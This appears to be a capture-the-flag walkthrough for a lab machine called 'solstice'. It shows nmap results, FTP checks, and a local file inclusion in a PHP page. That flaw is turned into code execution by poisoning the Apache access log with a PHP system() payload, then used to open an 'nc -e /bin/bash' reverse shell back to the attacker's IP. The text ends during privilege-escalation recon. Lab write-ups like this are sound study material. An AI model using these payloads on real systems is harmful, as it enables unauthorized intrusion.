PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.6
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.81.72:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5b:a7:37:fd:55:6c:f8:ea:03:f5:10:bc:94:32:07:18 (RSA)
| 256 ab:da:6a:6f:97:3f:b2:70:3e:6c:2b:4b:0c:b7:f6:4c (ECDSA)
|_ 256 ae:29:d4:e3:46:a1:b1:52:27:83:8f:8f:b0:c4:36:d1 (ED25519)
25/tcp open smtp Exim smtpd
| smtp-commands: solstice Hello nmap.scanme.org [192.168.49.125], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site does not have a title (text/html).
2121/tcp open ftp pyftpdlib 1.5.6
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.81.72:2121
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drws------ 2 www-data www-data 4096 Jun 18 2020 pub
3128/tcp open http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
8593/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Site does not have a title (text/html; charset=UTF-8).
54787/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
62524/tcp closed unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There are 2 FTP port opened, 21 and 2121.
Port 2121 has a /pub folder, which is writable by www-data
ftp> ls -la
229 Entering extended passive mode (|||52553|).
125 Data connection already open. Transfer starting.
drws------ 2 www-data www-data 4096 Jun 18 2020 pub
226 Transfer complete.
There is nothing on port 80, on the other side, we have port 8593
The Book List tab is vulnerable to LFI
LFI the Access Log
┌──(kali㉿VirtualBox)-[~]
└─$ curl 192.168.81.72 -A "<?php system(\\$_GET['cmd']);?>"
<head>
Currently configuring the database, try later.
<style type ="text/css" >
.footer{
position: fixed;
text-align: center;
bottom: 0px;
width: 100%;
}
</style>
</head>
<body>
<div class="footer">Proudly powered by phpIPAM 1.4</div>
</body>
Create reverse shell via php command from access.log
curl -s "<http://192.168.81.72:8593/index.php?book=../../../../../var/log/apache2/access.log&cmd=nc%20192.168.49.81%204444%20-e%20%2Fbin%2Fbash%20>"
On the other hand our netcat is listening
┌──(kali㉿VirtualBox)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.49.81] from (UNKNOWN) [192.168.81.72] 48092
whoami
www-data
pwd
/var/www
cat local.txt
8a6a738a69637b9332624e910a8e4b7c
There is something running on php
www-data@solstice:~$ ps aux | grep php
ps aux | grep php
www-data 509 0.0 0.0 2388 752 ? Ss 10:50 0:00 /bin/sh -c /usr/bin/php -S 0.0.0.0:54787 -t /var/tmp/webserver_2/
root 510 0.0 0.0 2388 760 ? Ss 10:50 0:00 /bin/sh -c /usr/bin/php -S 127.0.0.1:57 -t /var/tmp/sv/
www-data 512 0.0 0.0 2388 752 ? Ss 10:50 0:00 /bin/sh -c /usr/bin/php -S 0.0.0.0:8593 -t /var/tmp/webserver/
root 522 0.0 2.0 196744 21152 ? S 10:50 0:00 /usr/bin/php -S 127.0.0.1:57 -t /var/tmp/sv/
www-data 523 0.0 2.1 196936 21812 ? S 10:50 0:00 /usr/bin/php -S 0.0.0.0:8593 -t /var/tmp/webserver/
www-data 524 0.0 2.0 196744 21188 ? S 10:50 0:00 /usr/bin/php -S 0.0.0.0:54787 -t /var/tmp/webserver_2/
www-data 1785 0.0 0.0 6076 884 pts/0 S+ 11:09 0:00 grep php
User root is running php on /var/tmp/sv huh? what is it?